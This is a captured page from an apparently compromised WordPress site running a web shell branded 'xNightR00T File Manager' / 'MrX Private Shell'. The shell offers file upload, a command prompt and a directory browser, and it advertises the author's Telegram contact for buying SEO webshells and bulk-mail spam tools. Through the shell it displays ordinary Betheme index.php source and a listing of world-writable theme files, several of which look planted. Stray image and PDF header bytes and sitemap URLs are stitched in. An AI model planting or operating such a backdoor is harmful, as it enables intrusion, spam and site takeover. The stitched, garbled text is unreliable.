xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php
/**
 * The main template file.
 *
 * @package Betheme
 * @author Muffin group
 * @link https://muffingroup.com
 */

get_header();

// class

$blog_classes	= array();
$section_class = array();
$current_id = get_queried_object_id();

// class | layout

if ($_GET && key_exists('mfn-b', $_GET)) {
	$blog_layout = esc_html($_GET['mfn-b']); // demo
} else {
	$blog_layout = mfn_opts_get('blog-layout', 'classic');
}
$blog_classes[] = $blog_layout;

// layout | masonry tiles

if ($blog_layout == 'masonry tiles') {
	$blog_layout = 'masonry';
}

// class | columns

if ($_GET && key_exists('mfn-bc', $_GET)) {
	$blog_classes[] = 'col-'. esc_html($_GET['mfn-bc']); // demo
} else {
	$blog_classes[] = 'col-'. mfn_opts_get('blog-columns', 3);
}

// full width

if ($_GET && key_exists('mfn-bfw', $_GET)) {
	$section_class[] = 'full-width'; // demo
}
if (mfn_opts_get('blog-full-width') && ($blog_layout == 'masonry')) {
	$section_class[] = 'full-width';
}

$section_class = implode(' ', $section_class);

// isotope

if ($_GET && key_exists('mfn-iso', $_GET)) {
	$isotope = true;
} elseif (mfn_opts_get('blog-isotope')) {
	$isotope = true;
} else {
	$isotope = false;
}

if ($isotope || ($blog_layout == 'masonry')) {
	$blog_classes[] = 'isotope';
}

// load more

$load_more = mfn_opts_get('blog-load-more');

// translate

$translate['filter'] = mfn_opts_get('translate') ? mfn_opts_get('translate-filter', 'Filter by') : __('Filter by', 'betheme');
$translate['tags'] = mfn_opts_get('translate') ? mfn_opts_get('translate-tags', 'Tags') : __('Tags', 'betheme');
$translate['authors'] = mfn_opts_get('translate') ? mfn_opts_get('translate-authors', 'Authors') : __('Authors', 'betheme');
$translate['all'] = mfn_opts_get('translate') ? mfn_opts_get('translate-all', 'Show all') : __('Show all', 'betheme');
$translate['categories'] = mfn_opts_get('translate') ? mfn_opts_get('translate-categories', 'Categories') : __('Categories', 'betheme');
$translate['item-all'] = mfn_opts_get('translate') ? mfn_opts_get('translate-item-all', 'All') : __('All', 'betheme');
?>

<div id="Content">
	<div class="content_wrapper clearfix">

		<div class="sections_group">

			<div class="extra_content">
				<?php
					if (get_option('page_for_posts') || mfn_opts_get('blog-page')) {

						if (category_description()) {

							echo '<div class="section the_content category_description">';
								echo '<div class="section_wrapper">';
									echo '<div class="the_content_wrapper">';
										echo category_description();
									echo '</div>';
								echo '</div>';
							echo '</div>';

						} else {

							$mfn_builder = new Mfn_Builder_Front(mfn_ID(), true);
							$mfn_builder->show();

						}

					}
				?>
			</div>

			<?php if (($filters = mfn_opts_get('blog-filters')) && (is_home() || is_category() || is_tag() || is_author())): ?>

				<div class="section section-filters">
					<div class="section_wrapper clearfix">

						<?php
							$filters_class = '';

							if ($isotope) {
								$filters_class .= ' isotope-filters';
							}

							if ($filters != 1) {
								$filters_class .= ' only '. $filters;
							}
						?>

						<!-- #Filters -->
						<div id="Filters" class="column one <?php echo esc_attr($filters_class); ?>">

							<ul class="filters_buttons">
								<li class="label"><?php echo esc_html($translate['filter']); ?></li>
								<li class="categories"><a class="open" href="#"><i class="icon-docs"></i><?php echo esc_html($translate['categories']); ?><i class="icon-down-dir"></i></a></li>
								<li class="tags"><a class="open" href="#"><i class="icon-tag"></i><?php echo esc_html($translate['tags']); ?><i class="icon-down-dir"></i></a></li>
								<li class="authors"><a class="open" href="#"><i class="icon-user"></i><?php echo esc_html($translate['authors']); ?><i class="icon-down-dir"></i></a></li>
								<li class="reset"><a class="close" data-rel="*" href="<?php echo esc_url(get_permalink(mfn_ID())); ?>"><i class="icon-cancel"></i><?php echo esc_html($translate['all']); ?></a></li>
							</ul>

							<div class="filters_wrapper">

								<ul class="categories">
									<?php

										$class = false;
										if( ! ( is_category() || is_tag() || is_author() ) ){
											$class = 'current-cat';
										}

										echo '<li class="reset-inner '. $class .'"><a data-rel="*" href="'. esc_url(get_permalink(mfn_ID())) .'">'. esc_html($translate['item-all']) .'</a></li>';

										if ($categories = get_categories()) {

											$exclude = mfn_get_excluded_categories();

											foreach ($categories as $category) {

												$class = false;

												if ($exclude && in_array($category->slug, $exclude)) {
													continue;
												}
												if( is_category() && $current_id == $category->term_id ){
													$class = 'current-cat';
												}

												echo '<li class="'. esc_attr($class) .'"><a data-rel=".category-'. esc_attr($category->slug) .'" href="'. esc_url(get_term_link($category)) .'">'. esc_html($category->name) .'</a></li>';

											}
										}

									?>
									<li class="close"><a href="#"><i class="icon-cancel"></i></a></li>
								</ul>

								<ul class="tags">
									<?php

										echo '<li class="reset-inner"><a data-rel="*" href="'. esc_url(get_permalink(mfn_ID())) .'">'. esc_html($translate['item-all']) .'</a></li>';

										if ($tags = get_tags()) {
											foreach ($tags as $tag) {

												$class = false;

												if( is_tag() && $current_id == $tag->term_id ){
													$class = 'current-cat';
												}

												echo '<li class="'. esc_attr($class) .'"><a data-rel=".tag-'. esc_attr($tag->slug) .'" href="'. esc_url(get_tag_link($tag)) .'">'. esc_html($tag->name) .'</a></li>';

											}
										}

									?>
									<li class="close"><a href="#"><i class="icon-cancel"></i></a></li>
								</ul>

								<ul class="authors">
									<?php

										echo '<li class="reset-inner"><a data-rel="*" href="'. esc_url(get_permalink(mfn_ID())) .'">'. esc_html($translate['item-all']) .'</a></li>';

										$authors = mfn_get_authors();
										if (is_array($authors)) {
											foreach ($authors as $auth) {

												$class = false;

												if( is_author() && $current_id == $auth->ID ){
													$class = 'current-cat';
												}

												echo '<li class="'. esc_attr($class) .'"><a data-rel=".author-'. esc_attr(mfn_slug($auth->data->user_login)) .'" href="'. esc_url(get_author_posts_url($auth->ID)) .'">'. esc_html($auth->data->display_name) .'</a></li>';

											}
										}

									?>
									<li class="close"><a href="#"><i class="icon-cancel"></i></a></li>
								</ul>
							</div>

						</div>

					</div>
				</div>

			<?php endif; ?>

			<div class="section <?php echo esc_attr($section_class); ?>">
				<div class="section_wrapper clearfix">

					<div class="column one column_blog">
						<div class="blog_wrapper isotope_wrapper">

							<div class="posts_group lm_wrapper <?php echo esc_attr(implode(' ', $blog_classes)); ?>">
								<?php

									$attr = array(
										'echo' => true,
										'featured_image' => false,
										'filters' => $filters,
									);

									if ($load_more) {
										$attr['featured_image'] = 'no_slider';
									}
									if (mfn_opts_get('blog-images')) {
										$attr['featured_image'] = 'image';
									}

									echo mfn_content_post(false, false, $attr);
								?>
							</div>

							<?php
								if (function_exists('mfn_pagination')):

									echo mfn_pagination(false, $load_more);

								else:
									?>
										<div class="nav-next"><?php next_posts_link(__('&larr; Older Entries', 'betheme')) ?></div>
										<div class="nav-previous"><?php previous_posts_link(__('Newer Entries &rarr;', 'betheme')) ?></div>
									<?php
								endif;
							?>

						</div>
					</div>

				</div>
			</div>


		</div>

		<?php get_sidebar(); ?>

	</div>
</div>

<?php get_footer();

Filemanager

Name Type Size Permission Actions
assets Folder 0775
bbpress Folder 0775
css Folder 0775
fonts Folder 0775
functions Folder 0775
images Folder 0775
includes Folder 0775
js Folder 0775
languages Folder 0775
muffin-options Folder 0775
tribe-events Folder 0775
vc_templates Folder 0775
woocommerce Folder 0775
.SignUp.php.swp File 20 KB 0777
404.php File 128.13 KB 0777
SignIn.php File 5.9 KB 0777
SignUp.php File 21.46 KB 0775
bbpress.php File 598 B 0777
category-business.php File 6.41 KB 0775
category-chinh-tri.php File 6.41 KB 0775
category-customs.php File 6.41 KB 0775
category-green-growth.php File 6.41 KB 0775
category-headline-ja.php File 6.41 KB 0775
category-headline.php File 6.41 KB 0775
category-infographics.php File 6.41 KB 0775
category-kinh-te.php File 6.82 KB 0775
category-report.php File 6.82 KB 0775
category-tax-customs.php File 6.83 KB 0775
category-vietnam-investment-review.php File 6.84 KB 0775
changelog.html File 110.57 KB 0777
comments.php File 1.24 KB 0777
footer.php File 5.44 KB 0777
forgot-password.php File 1.73 KB 0775
functions.php File 40.53 KB 0775
header-shop.php File 4.78 KB 0777
header.php File 5.07 KB 0777
index.php File 8.11 KB 0777
login.php File 6.86 KB 0777
page.php File 2.33 KB 0775
readme.txt File 102 B 0777
register.php File 7.81 KB 0777
reset-password.php File 2.4 KB 0777
rtl.css File 33.09 KB 0777
screenshot.png File 179.96 KB 0777
search.php File 3.74 KB 0777
searchform.php File 831 B 0777
sidebar.php File 1.97 KB 0775
single-attachment.php File 706 B 0777
single-download.php File 4.15 KB 0777
single-portfolio.php File 2.21 KB 0777
single.php File 1.69 KB 0777
style-colors.php File 34.96 KB 0777
style-one.php File 22.26 KB 0777
style-responsive.php File 26.39 KB 0777
style.css File 361 B 0777
style.php File 51.65 KB 0775
taxonomy-portfolio-types.php File 5.34 KB 0777
template-archives.php File 1.89 KB 0777
template-blank.php File 971 B 0777
template-portfolio.php File 6.12 KB 0777
template-sitemap.php File 597 B 0777
text.php File 69 B 0777
under-construction.php File 5.37 KB 0777
wpml-config.xml File 12.23 KB 0777
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml